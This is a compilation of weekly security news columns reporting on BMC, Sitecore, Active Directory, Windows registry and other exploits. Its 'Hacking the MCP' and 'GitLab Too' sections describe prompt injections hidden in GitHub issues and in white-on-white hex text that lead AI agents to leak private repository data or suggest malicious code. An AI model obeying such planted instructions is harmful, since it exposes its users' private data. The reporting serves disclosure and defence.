Vista de Lectura

Hay nuevos artículos disponibles. Pincha para refrescar la página.

This Week in Security: MegaOWNed, Store Danger, and FileFix

Earlier this year, I was required to move my server to a different datacenter. The tech that helped handle the logistics suggested I assign one of my public IPs to the server’s Baseboard Management Controller (BMC) port, so I could access the controls there if something went sideways. I passed on the offer, and not only because IPv4 addresses are a scarce commodity these days. No, I’ve never trusted a server’s built-in BMC. For reasons like this MegaOWN of MegaRAC, courtesy of a CVSS 10.0 CVE, under active exploitation in the wild.

This vulnerability was discovered by Eclypsium back in March and it’s a pretty simple authentication bypass, exploited by setting an X-Server-Addr header to the device IP address and adding an extra colon symbol to that string. Send this along inside an HTTP request, and it’s automatically allowed without authentication. This was assigned CVE-2024-54085, and for servers with the BMC accessible from the Internet, it scores that scorching 10.0 CVSS.

We’re talking about this now, because CISA has added this CVE to the official list of vulnerabilities known to be exploited in the wild. And it’s hardly surprising, as this is a near-trivial vulnerability to exploit, and it’s not particularly challenging to find web interfaces for the MegaRAC devices using tools like Shodan and others.

There’s a particularly ugly scenario that’s likely to play out here: Embedded malware. This vulnerability could be chained with others, and the OS running on the BMC itself could be permanently modified. It would be very difficult to disinfect and then verify the integrity of one of these embedded systems, short of physically removing and replacing the flash chip. And malware running from this very advantageous position very nearly have the keys to the kingdom, particularly if the architecture connects the BMC controller over the PCIe bus, which includes Direct Memory Access.

This brings us to the really bad news. These devices are everywhere. The list of hardware that ships with the MegaRAC Redfish UI includes select units from “AMD, Ampere Computing, ASRock, ARM, Fujitsu, Gigabyte, Huawei, Nvidia, Supermicro, and Qualcomm”. Some of these vendors have released patches. But at this point, any of the vulnerable devices on the Internet, still unpatched, should probably be considered compromised.

Patching Isn’t Enough

To drive the point home that a compromised embedded device is hard to fully disinfect, we have the report from [Max van der Horst] at Disclosing.observer, detailing backdoors discovered in verious devices, even after the patch was applied.

These tend to hide in PHP code with innocent-looking filenames, or in an Nginx config. This report covers a scan of Citrix hosts, where 2,491 backdoors were discovered, which is far more than had been previously identified. Installing the patch doesn’t always mitigate the compromise.

VSCode

Many of us have found VSCode to be an outstanding IDE, and the fact that it’s Open Source and cross-platform makes it perfect for programmers around the world. Except for the telemetry, which is built into the official Microsoft builds. It’s Open Source, so the natural reaction from the community is to rebuild the source, and offer builds that don’t have telemetry included. We have fun names like VSCodium and Cursor for these rebuilds. Kudos to Microsoft for making VSCode Open Source so this is possible.

There is, however, a catch, in the form of the extension marketplace. Only official VSCode builds are allowed to pull extensions from the marketplace. As would be expected, the community has risen to the challenge, and one of the marketplace alternatives is Open VSX. And this week, we have the story of how a bug in the Open VSX publishing code could have been a really big problem.

When developers are happy with their work, and are ready to cut a release, how does that actually work? Basically every project uses some degree of automation to make releases happen. For highly automated projects, it’s just a single manual action — a kick-off of a Continuous Integration (CI) run — that builds and publishes the new release. Open VSX supports this sort of approach, and in fact runs a nightly GitHub Action to iterate through the list of extensions, and pull any updates that are advertised.

VS Code extensions are Node.js projects, and are built using npm. So the workflow clones the repository, and runs npm install to generate the installable packages. Running npm install does carry the danger that arbitrary code runs inside the build scripts. How bad would it be for malicious code to run inside this nightly update action, on the Open VSX GitHub repository?

A super-admin token was available as an environment variable inside this GitHub Action, that if exfiltrated would allow complete takeover of the Open VSX repository and unfettered access to the software contained therein. There’s no evidence that this vulnerability was found or exploited, and OpenVSX and Koi Security worked together to mitigate it, with the patch landing about a month and a half after first disclosure.

FileFix

There’s a new social engineering attack on the web, FileFix. It’s a very simple, nearly dumb idea. By that I mean, a reader of this column would almost certainly never fall for it, because FileFix asks the user to do something really unusual. You get an email or land on a bad website, and it appears present a document for you. To access this doc, just follow the steps. Copy this path, open your File Explorer, and paste the path. Easy! The website even gives you a button to click to launch file explorer.

That button actually launches a file upload dialog, but that’s not even the clever part. This attack takes advantage of two quirks. The first is that Javascript can inject arbitrary strings into the paste buffer, and the second is that system commands can be run from the Windows Explorer bar. So yes, copy that string, and paste it into the bar, and it can execute a command. So while it’s a dumb attack, and asks the user to do something very weird, it’s also a very clever intersection between a couple of quirky behaviors, and users will absolutely fall for this.

eMMC Data Extraction

The embedded MultiMediaCard (eMMC) is a popular option for flash storage on embedded devices. And Zero Day Initiative has a fascinating look into what it takes to pull data from an eMMC chip in-situ. An 8-leg EEPROM is pretty simple to desolder or probe, but the ball grid array of an eMMC is beyond the reach of mere mortals. If you’re soldering skills aren’t up to the task, there’s still hope to get that data off. The only connections needed are power, reference voltage, clock, a command line, and the data lines. If you can figure out connection points for all of those, you can probably power the chip and talk to it.

One challenge is how to keep the rest of the system from booting up and getting chatty. There’s a clever idea, to look for a reset pin on the MCU, and just hold that active while you work, keeping the MCU in a reset, and quiet, state. Another fun idea is to just remove the system’s oscillator, as the MCU may depend on it to boot and do anything.

Bits and Bytes

What would you do with 40,000 alarm clocks? That’s the question unintentionally faced by [Ian Kilgore], when he discovered that the loftie wireless alarm clock works over unsecured MQTT. On the plus side, he got Home Automation integration working.

What does it look like, when an attack gets launched against a big cloud vendor? The folks at Cloud-IAM pull the curtain back just a bit, and talk about an issue that almost allowed an enumeration attack to become an effective DDoS. They found the attack and patched their code, which is when it turned into a DDoS race, that Cloud-IAM managed to win.

The Wire secure communication platform recently got a good hard look from the Almond security team. And while the platform seems to have passed with good grades, there are a few quirks around file sharing that you might want to keep in mind. For instance, when a shared file is deleted, the backing files aren’t deleted, just the encryption keys. And the UUID on those files serves as the authentication mechanism, with no additional authentication needed. None of the issues found rise to the level of vulnerabilities, but it’s good to know.

And finally, the Centos Webpanel Control Web Panel has a pair of vulnerabilities that allowed running arbitrary commands prior to authorization. The flaws have been fixed in version 0.9.8.1205, but are trivial enough that this cPanel alternative needs to get patched on systems right away.

This Week in Security: That Time I Caused a 9.5 CVE, iOS Spyware, and The Day the Internet Went Down

Meshtastic just released an eye-watering 9.5 CVSS CVE, warning about public/private keys being re-used among devices. And I’m the one that wrote the code. Not to mention, I triaged and fixed it. And I’m part of Meshtastic Solutions, the company associated with the project. This is is the story of how we got here, and a bit of perspective.

First things first, what kind of keys are we talking about, and what does Meshtastic use them for? These are X25519 keys, used specifically for encrypting and authenticating Direct Messages (DMs), as well as optionally for authorizing remote administration actions. It is, by the way, this remote administration scenario using a compromised key, that leads to such a high CVSS rating. Before version 2.5 of Meshtastic, the only cryptography in place was simple AES-CTR encryption using shared symmetric keys, still in use for multi-user channels. The problem was that DMs were also encrypted with this channel key, and just sent with the “to” field populated. Anyone with the channel key could read the DM.

I re-worked an old pull request that generated X25519 keys on boot, using the rweather/crypto library. This sentence highlights two separate problems, that both can lead to unintentional key re-use. First, the keys are generated at first boot. I was made painfully aware that this was a weakness, when a user sent an email to the project warning us that he had purchased two devices, and they had matching keys out of the box. When the vendor had manufactured this device, they flashed Meshtastic on one device, let it boot up once, and then use a debugger to copy off a “golden image” of the flash. Then every other device in that particular manufacturing run was flashed with this golden image — containing same private key. sigh

There’s a second possible cause for duplicated keys, discovered while triaging the golden image issue. On the Arduino platform, it’s reasonably common to use the random() function to generate a pseudo-random value, and the Meshtastic firmware is careful to manage the random seed and the random() function so it produces properly unpredictable values. The crypto library is solid code, but it doesn’t call random(). On ESP32 targets, it does call the esp_random() function, but on a target like the NRF52, there isn’t a call to any hardware randomness sources. This puts such a device in the precarious position of relying on a call to micros() for its randomness source. While non-ideal, this is made disastrous by the fact that the randomness pool is being called automatically on first boot, leading to significantly lower entropy in the generated keys.

Release 2.6.11 of the Meshtastic firmware fixes both of these issues. First, by delaying key generation until the user selects the LoRa region. This makes it much harder for vendors to accidentally ship devices with duplicated keys. It gives users an easy way to check, just make sure the private key is blank when you receive the device. And since the device is waiting for the user to set the region, the micros() clock is a much better source of randomness. And second, by mixing in the results of random() and the burnt-in hardware ID, we ensure that the crypto library’s randomness pool is seeded with some unique, unpredictable values.

The reality is that IoT devices without dedicated cryptography chips will always struggle to produce high quality randomness. If you really need secure Meshtastic keys, you should generate them on a platform with better randomness guarantees. The openssl binary on a modern Linux or Mac machine would be a decent choice, and the Meshtastic private key can be generated using openssl genpkey -algorithm x25519 -outform DER | tail -c32 | base64.

What’s Up with SVGs?

You may have tried to share a Scalable Vector Graphics (SVG) on a platform like Discord, and been surprised to see an obtuse text document rather than your snazzy logo. Browsers can display SVGs, so why do many web platforms refuse to render them? I’ve quipped that it’s because SVGs are Turing complete, which is almost literally true. But in reality it’s because SVGs can include inline HTML and JavaScript. IBM’s X-Force has the inside scoop on the use of SVG files in fishing campaigns. The key here is that JavaScript and data inside an SVG can often go undetected by security solutions.

The attack chain that X-Force highlights is convoluted, with the SVG containing a link offering a PDF download. Clicking this actually downloads a ZIP containing a JS file, which when run, downloads and attempts to execute a JAR file. This may seem ridiculous, but it’s all intended to defeat a somewhat sophisticated corporate security system, so an inattentive user will click through all the files in order to get the day’s work done. And apparently this tactic works.

*OS Spyware

Apple published updates to its entire line back in February, fixing a pair of vulnerabilities that were being used in sophisticated targeted attacks. CVE-2025-43200 was “a logic issue” that could be exploited by malicious images or videos sent in iCloud links. CVE-2025-24200 was a flaw in USB Restricted Mode, that allowed that mode to be disabled with physical access to a device.

What’s newsworthy about these vulnerabilities is that Citizen Lab has published a report that CVE-2025-43200 was used in a 0-day exploitation of journalists by the Paragon Graphite spyware. It is slightly odd that Apple credits the other fixed vulnerability, CVE-2025-24200, to Bill Marczak, a Citizen Lab researcher and co-author of this report. Perhaps there is another shoe yet to drop.

Regardless, iOS infections have been found on the phones of two separate European Journalists, with a third confirmed targeted. It’s unclear what customer contracted Paragon to spy on these journalists, and what the impetus was for doing so. Companies like Paragon, NSO Group, and others operate within a legal grey area, taking actions that would normally be criminal, but under the authority of governments.

A for Anonymous, B for Backdoor

WatchTowr has a less-snarky-than-usual treatment of a chain of problems in the Sitecore Experience that take an unauthenticated attacker all the way to Remote Code Execution (RCE). The initial issue here is the pre-configured user accounts, like default\Anonymous, used to represent unauthenticated users, and sitecore\ServicesAPI, used for internal actions. Those special accounts do have password hashes. Surely there isn’t some insanely weak password set for one of those users, right? Right? The password for ServicesAPI is b.

ServicesAPI is interesting, but trying the easy approach of just logging in with that user on the web interface fails with a unique error message, that this user does not have access to the system. Someone knew this could be a problem, and added logic to prevent this user from being used for general system access, by checking which database the current handler is attached to. Is there an endpoint that connects to a different database? Naturally. Here it’s the administrative web login, that has no database attached. The ServicesAPI user can log in here! Good news is that it can’t do anything, as this user isn’t an admin. But the login does work, and does result in a valid session cookie, which does allow for other actions.

There are several approaches the WatchTowr researchers tried, in order to get RCE from the user account. They narrowed in on a file upload action that was available to them, noting that they could upload a zip file, and it would be automatically extracted. There were no checks for path traversal, so it seems like an easy win. Except Sitecore doesn’t necessarily have a standard install location, so this approach has to guess at the right path traversal steps to use. The key is that there is just a little bit of filename mangling that can be induced, where a backslash gets replaced with an underscore. This allows a /\/ in the path traversal path to become /_/, a special sequence that represents the webroot directory. And we have RCE. These vulnerabilities have been patched, but there were more discovered in this research, that are still to be revealed.

The Day the Internet Went Down

OK, that may be overselling it just a little bit. But Google Cloud had an eight hour event on the 12th, and the repercussions were wide, including taking down parts of Cloudflare for part of that time on the same day.

Google’s downtime was caused by bad code that was pushed to production with insufficient testing, and that lacked error handling. It was intended to be a quota policy check. A separate policy change was rolled out globally, that had unintentional blank fields. These blank fields hit the new code, and triggered null pointer de-references all around the globe all at once. An emergency fix was deployed within an hour, but the problem was large enough to have quite a long tail.

Cloudflare’s issue was connected to their Workers KV service, a Key-Value store that is used in many of Cloudflare’s other products. Workers KV is intended to be “coreless”, meaning a cascading failure should be impossible. The reality is that Workers KV still uses a third-party service as the bootstrap for that live data, and Google Cloud is part of that core. When Google’s cloud starting having problems, so did Cloudflare, and much of the rest of the Internet.

I can’t help but worry just a bit about the possible scenario, where Google relies on an outside service, that itself relies on Cloudflare. In the realm of the power grid, we sometimes hear about the cold start scenario, where everything is powered down. It seems like there is a real danger of a cold start scenario for the Internet, where multiple giant interdependent cloud vendors are all down at the same time.

Bits and Bytes

Fault injection is still an interesting research topic, particularly for embedded targets. [Maurizio Agazzini] from HN Security is doing work on voltage injection against an ESP32 V3 target, with the aim of coercing the processor to jump over an instruction and interpret a CRC32 code as an instruction pointer. It’s not easy, but he managed 1.5% success rate at bypassing secure boot with the voltage injection approach.

Intentional jitter is used in many exploitation tools, as a way to disguise what might otherwise be tell-tale traffic patterns. But Varonis Threat Labs has produced Jitter-Trap, a tool that looks for the Jitter, and attempts to identify the exploitation framework in use from the timing information.

We’ve talked a few times about vibe researching, but [Craig Young] is only tipping his toes in here. He used an LLM to find a published vulnerability, and then analyzed it himself. Turns out that the GIMP despeckle plugin doesn’t do bounds checking for very large images. Back again to an LLM, to get a Python script to generate such a file. It does indeed crash GIMP when trying to despeckle, confirming the vulnerability report, and demonstrating that there really are good ways to use LLMs while doing security research.

FLOSS Weekly Episode 837: World’s Best Beta Tester

This week Jonathan chats with Geekwife! What does a normal user really think of Linux on the desktop and Open Source options? And what is it really like, putting up with Jonathan’s shenanigans? Watch to find out!

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

This Week in Security: The Localhost Bypass, Reflections, and X

Facebook and Yandex have been caught performing user-hostile tracking. This sort of makes today just another Friday, but this is a bit special. This time, it’s Local Mess. OK, it’s an attack with a dorky name, but very clever. The short explanation is that web sites can open connections to localhost. And on Android, apps can be listening to those ports, allowing web pages to talk to apps.

That may not sound too terrible, but there’s a couple things to be aware of. First, Android (and iOS) apps are sandboxed — intentionally making it difficult for one app to talk to another, except in ways approved by the OS maker. The browser is similarly sandboxed away from the apps. This is a security boundary, but it is especially an important security boundary when the user is in incognito mode.

The tracking Pixel is important to explain here. This is a snippet of code, that puts an invisible image on a website, and as a result allows the tracker to run JavaScript in your browser in the context of that site. Facebook is famous for this, but is not the only advertising service that tracks users in this way. If you’ve searched for an item on one site, and then suddenly been bombarded with ads for that item on other sites, you’ve been tracked by the pixel.

This is most useful when a user is logged in, but on a mobile device, the user is much more likely to be logged in on an app and not the browser. The constant pressure for more and better data led to a novel and completely unethical solution. On Android, applications with permission to access the Internet can listen on localhost (127.0.0.1) on unprivileged ports, those above 1024.

Facebook abused this quirk by opening a WebRTC connection to localhost, to one of the ports the Facebook app was listening on. This triggers an SDP connection to localhost, which starts by sending a STUN packet, a UDP tool for NAT traversal. Packed into that STUN packet is the contents of a Facebook Cookie, which the Facebook app happily forwards up to Facebook. The browser also sends that cookie to Facebook when loading the pixel, and boom Facebook knows what website you’re on. Even if you’re not logged in, or incognito mode is turned on.

Yandex has been doing something similar since 2017, though with a different, simpler mechanism. Rather than call localhost directly, Yandex just sets aside yandexmetrica.com for this purpose, with the domain pointing to 127.0.0.1. This was just used to open an HTTP connection to the native Yandex apps, which passed the data up to Yandex over HTTPS. Meta apps were first seen using this trick in September 2024, though it’s very possible it was in use earlier.

Both companies have ceased since this report was released. What’s interesting is that this is a flagrant violation of GDPR and CCPA, and will likely lead to record-setting fines, at least for Facebook.

What’s your Number?

An experiment in which Google sites still worked with JavaScript disabled led to a fun discovery about how to sidestep rate limiting and find any Google user’s phone number. Google has deployed defensive solutions to prevent attackers from abusing endpoints like accounts.google.com/signing/usernamerecovery. That particular endpoint still works without JS, but also still detects more than a few attempts, and throws the captcha at anyone trying to brute-force it.

This is intended to work by JS in your browser performing a minor proof-of-work calculation, and then sends in a bgRequest token. On the no-JavaScript version of the site, that field instead was set to js_disabled. What happens if you simply take the valid token, and stuff it into your request? Profit! This unintended combination bypassed rate-limiting, and means a phone number was trivially discoverable from just a user’s first and last names. It was mitigated in just over a month, and [brutecat] earned a nice $5000 for the effort.

Catching Reflections

There’s a classic Active Directory attack, the reflection attack, where you can trick a server into sending you an authentication, and then deliver that authentication data directly back to the origin server. Back before 2008, this actually worked on AD servers. The crew at RedTeam Pentesting brought this attack back in the form of doing it with Kerberos.

It’s not a trivial attack, and just forcing a remote server to open an SMB connection to a location the attack controls is an impressive vulnerability. The trick is a hostname that includes the target name and a base64 encoded CREDENTIAL_TARGET_INFORMATIONW all inside the attacker’s valid hostname. This confuses the remote, triggering it to act as if it’s authenticating to itself. Forcing a Kerberos authentication instead of NTLM completes the attacker magic, though there’s one more mystery at play.

When the attack starts, the attacker has a low-privileged computer account. When it finishes, the access is at SYSTEM level on the target. It’s unclear exactly why, though the researchers theorize that a mitigation intended to prevent almost exactly this privilege escalation is the cause.

X And the Juicebox

X has rolled out a new end to end encrypted chat solution, XChat. It’s intended to be a significant upgrade from the previous iteration, but not everyone is impressed. Truly end to end encryption is extremely hard to roll out at scale, among other reasons, because users are terrible at managing cryptography keys. The solution generally is for the service provider to store the keys instead. But what is the point of end-to-end encryption when the company holds the keys? While there isn’t a complete solution for this problem, There is a very clever mitigation: Juicebox.

Juicebox lets users set a short PIN, uses that in the generation of the actual encryption key, breaks the key into parts to be held at different servers, and then promise to erase the key if the PIN is guessed incorrectly too many times. This is the solution X is using. Sounds great, right? There are two gotchas in that description. The first is the different servers: That’s only useful if those servers aren’t all run by the same company. And second, the promise to delete the key. That’s not cryptographically guaranteed.

There is some indication that X is running a pair of Hardware Security Modules (HSMs) as part of their Juicebox system, which significantly helps with both of those issues, but there just isn’t enough transparency into the system yet. For the time being, the consensus is that Signal is still the safest platform to use.

Bits and Bytes

We’re a bit light on Bits this week, so you’ll have to get by with the report that Secure Boot attacks are publicly available. It’s a firmware update tool from DT Research, and is signed by Microsoft’s UEFI keys. This tool contains a vulnerability that allows breaking out of it’s intended use, and running arbitrary code. This one has been patched, but there’s a second, similar problem in a Microsoft-signed IGEL kernel image, that allows running an arbitrary rootfs. This isn’t particularly a problem for us regular users, but the constant stream of compromised, signed UEFI boot images doesn’t bode well for the long term success of Secure Boot as a security measure.

This Week in Security: CIA Star Wars, Git* Prompt Injection and More

The CIA ran a series of web sites in the 2000s. Most of them were about news, finance, and other relatively boring topics, and they spanned 29 languages. And they all had a bit of a hidden feature: Those normal-looking websites had a secret login and hosted CIA cover communications with assets in foreign countries. A password typed in to a search field on each site would trigger a Java Applet or Flash application, allowing the spy to report back. This isn’t exactly breaking news, but what’s captured the Internet’s imagination this week is the report by [Ciro Santilli] about how to find those sites, and the fact that a Star Wars fansite was part of the network.

This particular CIA tool was intended for short-term use, and was apparently so effective, it was dragged way beyond it’s intended lifespan, right up to the point it was discovered and started getting people killed. And in retrospect, the tradecraft is abysmal. The sites were hosted on a small handful of IP blocks, with the individual domains hosted on sequential IP addresses. Once one foreign intelligence agency discovered one of these sites, the rest were fairly easily identified.

This report is about going back in time using the Wayback Machine and other tools, and determining how many of these covert sites can be discovered today. And then documenting how it was done and what the results were. Surprisingly, some of the best sources for this effort were domain name data sets. Two simple checks to narrow down the possible targets were checking for IPs hosting only one domain, and for the word “news” as part of the domain name. From there, it’s the tedious task of looking at the Wayback Machine’s archives, trying to find concrete hits. Once a site was found on a new IP block, the whole block could be examined using historic DNS data, and hopefully more of the sites discovered.

So far, that list is 472 domains. Citizen Lab ran a report on this covert operation back in 2022, and found 885 domains, but opted not to publish the list or details of how they were found. The effort is still ongoing, and if you have any ideas how to find these sites, there’s a chance to help.

Profiling Internet Background Radiation

You may have noticed, that as soon as you put a host on a new IP address on the Internet, it immediately starts receiving traffic. The creative term that refers to all of this is Internet Background Radiation. It’s comprised of TCP probes, reflections from spoofed UDP attacks, and lots of other weird traffic. Researchers at Netscout decided to look at just one element of that radiation, TCP SYN packets. That’s the unsolicited first packet of a TCP handshake. What secrets would this data contain?

The first intriguing statistic is the number of spoofed TCP SYN packets coming from known bogus source IPs: zero. This isn’t actually terribly surprising for a couple reasons. One, packets originating from impossible addresses are rather easy to catch and drop, and many ISPs do this sort of scrubbing at their network borders. But the second reason is that TCP requires a three-way handshake to make a useful connection. And while it’s possible to spoof an IP address on a local network via ARP poisoning, doing so on the open Internet is much more difficult.

Packet TTL is interesting, but the values naturally vary, based on the number of hops between the sender and receiver. A few source IPs were observed to vary in reported TTLs, which could indicate devices behind NAT, or even just the variation between different OS network stacks. But looking for suspicious traffic, two metrics really stand out. The TCP Header is a minimum 20 bytes, with additional length being used with each additional option specified. Very few systems will naturally send TCP SYN packets with the header set to 20, suggesting that the observed traffic at that length was mostly TCP probes. The other interesting observation is the TCP window size, with 29,200 being a suspicious number that was observed in a significant percentage of packets, without a good legitimate explanation.

Hacking the MCP

GitHub has developed the GitHub MCP Server, a Master Control Program Model Context Protocol server, designed to allow AI agents to interact with the GitHub API. Invariant Labs has put together an interesting demo in how letting an agentic AI work with arbitrary issues from the public could be a bad idea.

The short explanation is that a GitHub issue can include a prompt injection attack. In the example, it looks rather benign, asking for more information about the project author to be added to the project README. Just a few careful details in that issue, like specifying that the author isn’t concerned about privacy, and that the readme update should link to all the user’s other repos. If the repo owner lets an agentic AI loose on the repo via MCP, it’s very likely to leak details and private repo information that it really shouldn’t.

Invariant Labs suggests that MCP servers will need granular controls, limiting what an AI agent can access. I suspect we’ll eventually see a system for new issues like GitHub already has for Pull Requests, where a project maintainer has to approve the PR before any of the automated Github Actions are performed on it. Once AI is a normal part of dealing with issues, there will need to be tools to keep the AI from interacting with new issues until a maintainer has cleared them.

GitLab Too

GitLab has their own AI integration, GitLab Duo. Like many AI things, it has the potential to be helpful, and the potential to be a problem. Researchers at Legit Security included some nasty tricks in this work, like hiding prompt injection as Hex code, and coloring it white to be invisible on the white GitLab background. Prompt injections could then ask the AI to recommend malicious code, include raw HTML in the output, or even leak details from private repos.

Gitlab took the report seriously, and has added additional filtering that prevents Duo from injecting raw HTML in its output. The prompt injection has also been addressed, but the details of how are not fully available.

Finally, Actually Hacking the Registry

We’ve been following Google’s Project Zero and [Mateusz Jurczyk] for quite a while, on a deep dive into the Windows Registry. We’re finally at the point where we’re talking about vulnerabilities. The Windows registry is self-healing, which could be an attack surface on its own, but it definitely provides a challenge to anyone looking for vulnerabilities with a fuzzer, as triggering a crash is very difficult.

But as the registry has evolved over time and Windows releases, the original security assumptions may not be valid any longer. For instance, in its original form, the registry was only writable by a system administrator. But on modern Windows machines, application hives allow unprivileged users and process to load their own registry data into the system registry. Registry virtualization and layered keys further complicate the registry structure and code, and with complexity often comes vulnerabilities.

An exploit primitive that turned out to be useful was the out-of-bound cell index, where one cell can refer to another. This includes a byte offset value, and when the cell being referred to is a “small dir”, this offset can point past the end of the allocated memory.

There were a whopping 17 memory corruption exploits discovered, but to produce a working exploit, the write-up uses CVE-2023-23420, a use after free that can be triggered by performing an in-place rename of a key, followed by deleting a subkey. This can result in a live reference to that non-existent subkey, and thus access to freed memory.

In that free memory, a fake key is constructed. As the entire data structure is now under the arbitrary control of the attacker, the memory can point to anywhere in the hive. This can be combined with the out-of-bounds cell index, to manipulate kernel memory. The story turns into a security researcher flex here, as [Mateusz] opted to use a couple registry keys rigged in this way to make a working kernel memory debugger, accessible from regedit. One key sets the memory address to inspect, and the other key contains said memory as a writable key. Becoming SYSTEM at this point is trivial.

Bits and Bytes

[Thomas Stacey] of Assured has done work on HTTP smuggling/tunneling attacks, where multiple HTTP requests exist in a single packet. This style of attack works against web infrastructure that has a front-end proxy and a back-end worker. When the front-end and back-end parse requests differently, very unintended behavior can result.

ONEKEY researchers have discovered a pair of issues in the Evertz core web administration interface, that together allow unauthenticated arbitrary command injection. Evertz manufactures very large video handling equipment, used widely in the broadcast industry, which is why it’s so odd that the ONEKEY private disclosure attempts were completely ignored. As the standard 90 day deadline has passed, ONEKEY has released the vulnerability details in full.

On the other hand, Mozilla is setting records of its own, releasing a Firefox update on the same day as exploits were revealed at pwn2own 2025. Last year Mozilla received the “Fastest to Patch” award, and may be on track to repeat that honor.

What does video game cheat development have to do with security research? It’s full of reverse engineering, understand memory structures, hooking functions, and more. It’s all the things malware does to take over a system, and all the things a researcher does to find vulnerabilities and understand what binaries are doing. If you’re interested, there’s a great two-part series on the topic just waiting for you to dive into. Enjoy!

This Week in Security: Signal DRM, Modern Phone Phreaking, and the Impossible SSH RCE

Digital Rights Management (DRM) has been the bane of users since it was first introduced. Who remembers the battle it was getting Netflix running on Linux machines, or the literal legal fight over the DVD DRM decryption key? So the news from Signal, that DRM is finally being put to use to protect users is ironic.

The reason for this is Microsoft Recall — the AI powered feature that takes a snapshot of everything on the user’s desktop every few seconds. For whatever reason, you might want to exempt some windows from Recall’s memory window. It doesn’t speak well for Microsoft’s implementation that the easiest way for an application to opt out of the feature is to mark its window as containing DRM content. Signal, the private communications platform, is using this to hide from Recall and other screenshotting applications.

The Signal blogs warns that this may be just the start of agentic AI being rolled out with insufficient controls and permissions. The issue here isn’t the singularity or AI reaching sentience, it’s the same old security and privacy problems we’ve always had: Too much information being collected, data being shared without permission, and an untrusted actor having access to way more than it should.

Legacy Malware?

The last few stories we’ve covered about malicious code in open source repositories have featured how quickly the bad packages were caught. Then there’s this story about two-year-old malicious packages on NPM that are just now being found.

It may be that the reason these packages weren’t discovered until now, is that these packages aren’t looking to exfiltrate data, or steal bitcoin, or load other malware. Instead, these packages have a trigger date, and just sabotage the systems they’re installed on — sometimes in rather subtle ways. If a web application you were writing was experiencing intermittent failures, how long would it take you to suspect malware in one of your JavaScript libraries?

Where Are You Calling From?

Phone phreaking isn’t dead, it has just gone digital. One of the possibly apocryphal origins of phone phreaking was a toy bo’sun whistle in boxes of cereal, that just happened to play a 2600 Hz tone. More serious phreakers used more sophisticated, digital versions of the whistle, calling them blue boxes. In modern times, apparently, the equivalent of the blue box is a rooted Android phone. [Daniel Williams] has the story of playing with Voice over LTE (VoLTE) cell phone calls. A bug in the app he was using forced him to look at the raw network messages coming from O2 UK, his local carrier.

And those messages were weird. VoLTE is essentially using the Session Initiation Protocol (SIP) to handle cell phone calls as Voice over IP (VoIP) calls using the cellular data network. SIP is used in telephony all over the place, from desk phones to video conferencing solutions. SIP calls have headers that work to route the call, which can contain all sorts of metadata about the call. [Daniel] took a look at the SIP headers on a VoLTE call, and noticed some strange things. For one, the International Mobile Subscriber Identity (IMSI) and International Mobile Equipment Identity (IMEI) codes for both the sender and destination were available.

He also stumbled onto an interesting header, the Cellular-Network-Info header. This header encodes way too much data about the network the remote caller is connected to, including the exact tower being used. In an urban environment, that locates a cell phone to an area not much bigger than a city block. Together with leaking the IMSI and IMEI, this is a dangerous amount of information to leak to anyone on the network. [Daniel] attempted to report the issue to O2 in late March, and was met with complete silence. However, a mere two days after this write-up was published, on May 19th, O2 finally made contact, and confirmed that the issue had finally been resolved.

ARP Spoofing in Practice

TCP has an inherent security advantage, because it’s a stateful connection, it’s much harder to make a connection from a spoofed IP address. It’s harder, but it’s not impossible. One of the approaches that allows actual TCP connections from spoofed IPs is Address Resolution Protocol (ARP) poisoning. Ethernet switches don’t look at IP addresses, but instead route using MAC addresses. ARP is the protocol that distributes the MAC Address to IP mapping on the local network.

And like many protocols from early in the Internet’s history, ARP requests don’t include any cryptography and aren’t validated. Generally, whoever claims an IP address first wins, so the key is automating this process. And hence, enter NetImposter, a new tool specifically designed to automate this process, sending spoofed ARP packets, and establishing an “impossible” TCP connection.

Impossible RCE in SSH

Over two years ago, researchers at Qualsys discovered a pre-authentication double-free in OpenSSH server version 9.1. 9.2 was quickly released, and because none of the very major distributions had shipped 9.1 yet, what could have been a very nasty problem was patched pretty quietly. Because of the now-standard hardening features in modern Linux and BSD distributions, this vulnerability was thought to be impossible to actually leverage into Remote Code Execution (RCE).

If someone get a working OpenSSH exploit from this bug, I'm switching my main desktop to Windows 98 😂 (this bug was discovered by a Windows 98 user who noticed sshd was crashing when trying to login to a Linux server!)

— Tavis Ormandy (@taviso) February 14, 2023

The bug was famously discovered by attempting to SSH into a modern Linux machine from a Windows 98 machine, and Tavis Ormandy claimed he would switch to Windows 98 on his main machine if someone did actually manage to exploit it for RCE. [Perri Adams] thought this was a hilarious challenge, and started working an exploit. Now we have good and bad news about this effort. [Perri] is pretty sure it is actually possible, to groom the heap and with enough attempts, overwrite an interesting pointer, and leak enough information in the process to overcome address randomization, and get RCE. The bad news is that the reward of dooming [Tavis] to a Windows 98 machine for a while wasn’t quite enough to be worth the pain of turning the work into a fully functional exploit.

But that’s where [Perri’s] OffensiveCon keynote took an AI turn. How well would any of the cutting-edge AIs do at finding, understanding, fixing, and exploiting this vulnerability? As you probably already guessed, the results were mixed. Two of the three AIs thought the function just didn’t have any memory management problems at all. Once informed of the problem, the models had more useful analysis of the code, but they still couldn’t produce any remotely useful code for exploitation. [Perri’s] takeaway is that AI systems are approaching the threshold of being useful for defensive programming work. Distilling what code is doing, helping in reverse engineering, and working as a smarter sort of spell checker are all wins for programmers and security researchers. But fortunately, we’re not anywhere close to a world where AI is developing and deploying exploitations.

Bits and Bytes

There are a pair of new versions of reverse engineering/forensic tools released very recently. Up first is Frida, a runtime debugger on steroids, that is celebrating its 17th major version release. One of the major features is migrating to pluggable runtime bridges, and moving away from strictly bundling them. We also have Volatility 3, a memory forensics framework. This isn’t the first Volatility 3 release, but it is the release where version three officially has parity with the version two of the framework.

The Foscam X5 security camera has a pair of buffer overflows, each of which can be leveraged to acieve arbitrary RCE. One of the proof-of-concepts has a very impressive use of a write-null-anywhere primitive to corrupt a return pointer, and jump into a ROP gadget. The concerning element of this disclosure is that the vendor has been completely unresponsive, and the vulnerabilities are still unaddressed.

And finally, one of the themes that I’ve repeatedly revisited is that airtight attribution is really difficult. [Andy Gill] walks us through just one of the many reasons that’s difficult. Git cryptographically signs the contents of a commit, but not the timestamps. This came up when looking through the timestamps from “Jia Tan” in the XZ compromise. Git timestamps can be trivially rewritten. Attestation is hard.

